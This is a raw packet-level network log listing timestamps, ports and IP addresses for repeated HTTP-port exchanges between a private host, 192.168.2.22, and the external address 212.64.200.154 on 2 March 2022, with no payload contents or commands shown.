Mar 2, 2022 16:17:21.812864065 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812874079 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.812879086 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.812882900 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.812886953 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.812896013 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.812901020 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812939882 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812952042 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.812974930 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812985897 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.813014030 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.813018084 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.813049078 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.813057899 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.813106060 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.813148022 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.813183069 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.813199043 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.813219070 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.813230991 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.813256025 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.813286066 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.813292027 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.813294888 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.813334942 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.813889980 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.825547934 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825593948 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825611115 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825629950 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825649023 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825665951 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825683117 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825746059 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825763941 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825781107 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.825813055 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.825855970 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.825860977 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.826664925 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.890533924 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.890568018 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.890585899 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.890603065 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.890619040 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.890633106 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.890675068 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.890680075 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:26.866925001 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:26.867120028 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.140536070 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.140599012 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.140623093 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.140645027 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.140674114 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.140701056 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.140728951 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.140755892 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.140801907 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.140839100 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.140850067 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.156390905 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.156430960 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.156452894 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.156476021 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.156498909 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.156522036 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.156549931 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.156573057 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.156594038 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.156639099 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.156644106 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.156646013 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.499955893 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500005007 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500032902 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500166893 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500190020 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500211954 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500232935 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500251055 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500255108 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500277042 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500283003 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500288010 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500293016 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500297070 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500298023 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500302076 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500318050 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500334978 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500358105 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500365973 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500377893 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500381947 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500405073 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500425100 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500427961 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500441074 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500448942 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500451088 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.500457048 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500473976 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.500497103 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.501179934 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.516330957 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516377926 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516401052 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516429901 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516457081 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516483068 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516509056 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516541004 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516570091 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516597033 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.516597033 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.516650915 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.516659975 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.516664982 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.516688108 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.517225981 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:27.593517065 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.593569994 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.593607903 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.593636990 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.593666077 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:27.593889952 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:32.891315937 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:32.891674042 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.183744907 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.183819056 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.183861971 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.183897972 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.183955908 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184012890 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184031010 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184048891 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184076071 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184081078 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184097052 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184118032 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184144974 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184155941 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184176922 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184195995 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184217930 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184231997 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184271097 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184273005 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184300900 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184309959 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184350014 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184354067 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184364080 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184386969 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.184406042 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.184452057 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.185435057 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.547655106 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.547693968 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.547714949 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.547734976 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.547754049 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.547775030 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.547818899 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.547842026 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.547864914 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.547875881 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.547938108 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.548018932 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.548051119 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.548077106 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.548110962 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.548130989 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.548161983 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.548188925 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.548191071 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.548242092 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.548252106 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.548279047 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.548305035 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.548351049 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.548376083 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.548513889 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.572128057 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.572171926 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.572194099 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.572321892 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.594079971 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.594120979 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.594491959 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.595758915 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.595797062 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.595824003 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.595848083 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.595849037 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.595873117 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.595879078 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.595911026 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.595947027 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.672405958 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.672447920 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.672489882 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.672513008 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.672537088 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:33.672625065 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:33.675003052 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:38.745062113 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:38.745235920 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274328947 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274357080 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274379015 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274401903 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274424076 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274446011 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274467945 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274490118 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274535894 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274571896 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274609089 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274633884 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274655104 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274665117 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274677992 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274677992 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274701118 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274705887 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274714947 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274740934 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274823904 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274852991 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274878025 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.274878025 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274921894 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.274935007 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.275732994 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.595909119 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.595935106 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.595947981 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.595966101 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.595983028 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596000910 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596019030 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596041918 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596062899 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596082926 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596101046 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596105099 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596127987 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596129894 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596136093 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596139908 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596143961 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596148014 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596151114 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596168041 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596174002 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596195936 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596195936 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596208096 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596234083 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596271992 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596290112 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.596318007 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596328974 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.596846104 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.646080017 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.646117926 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.646150112 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.646316051 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.704091072 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.704121113 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.704135895 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.704150915 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.704166889 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.704190016 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.704355001 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.704370975 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.704410076 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.704490900 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.802489996 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.802560091 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.804838896 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.804871082 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.804894924 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.804933071 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:39.804940939 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.804965973 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:39.804970980 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:45.546107054 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:45.546317101 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.198817015 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.198846102 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.198858976 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.198873043 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.198889971 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.199132919 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.199152946 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.199184895 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.199202061 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.199254990 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.199284077 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.199340105 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.218400002 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.218430996 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.218642950 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.218765020 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.218786955 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.218803883 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.218818903 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.218836069 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.218852997 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.218856096 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.218940973 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.218977928 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.415812016 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.415846109 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.415859938 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.415873051 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.415885925 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.415899038 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.415911913 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.415925026 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.416230917 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.435122967 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.435163021 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.435179949 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.435199022 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.435211897 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.435291052 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.435376883 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.435395956 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.435441971 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.435451984 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.435463905 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.437309027 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.437330961 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.437446117 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.490120888 CET	80	49167	212.64.200.154	192.168.2.22
